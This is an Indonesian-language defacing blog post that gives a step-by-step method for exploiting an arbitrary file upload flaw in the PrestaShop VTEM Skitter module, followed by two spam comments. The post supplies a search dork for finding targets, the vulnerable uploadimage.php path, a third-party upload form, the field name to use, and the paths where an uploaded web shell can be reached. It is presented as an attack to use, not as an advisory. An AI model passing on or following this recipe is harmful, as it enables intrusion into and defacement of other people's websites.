Deface Method Prestashop VTEM Skitter Arbitrary File Upload - Noob Exploded

Blogging , Defacing , Pentesting , News Hacking

Tuesday, 28 March 2017

Deface Method Prestashop VTEM Skitter Arbitrary File Upload

Kali ini ane mau post tutorial deface Prestashop VTEM Skitter Arbitary File Upload , Kemungkinan tutorial ini masih fresh :V , Kita langsung nyimeng tutorialnya :V



Dork : inurl:modules/vtemskitter/ ( Dork bisa dikembangin dengan otak imajinasimu )

Exploit : /modules/vtemskitter/uploadimage.php

CSRF online kami bawa dari Aweu404 , Tq Aweu404

https://www.my.aweu404.id/aw.php

Postname Isi dengan : userfile

Akses Shell : site.co.li/modules/vtemskitter/img/urfile 
atau site.co.li/modules/vtemskitter/slides/urfile

Langkah :

1. Dorking , searchnya di images/gambar sajah
2. pilih salah satu gambar
3. masukan exploit di atas seperti : site.co.li/[path]/modules/vtemskitter/uploadimage.php
4. vuln ? di pojok bacaan error
5. masukkan site yg vuln tdi ke csrf , isi Postname dengan = userfile. kalo sudak klik Oke
6. upload shell ente , kalo sudah klik jos
7. akses file liat di atas


Cukup Segitu ajh , Postingan ini dibuat dengan sedemikian rupa :V

Having Deface All defacer ^_^

TTD : Fix404


2 comments:

  1. Excellent script, I also put it on my site, greatly facilitated the work with files. Also I recommend to use ready-made optimized templates prestashop https://www.templatemonster.com/ru/prestashop-themes-type/, created for specific topics. For example, I use the prestashop design template and the picture is somewhat similar to such aggregators as 500mpx

    ReplyDelete
  2. I really appreciate this wonderful post that you have provided for us. I assure this would be beneficial for most of the people. logo design

    ReplyDelete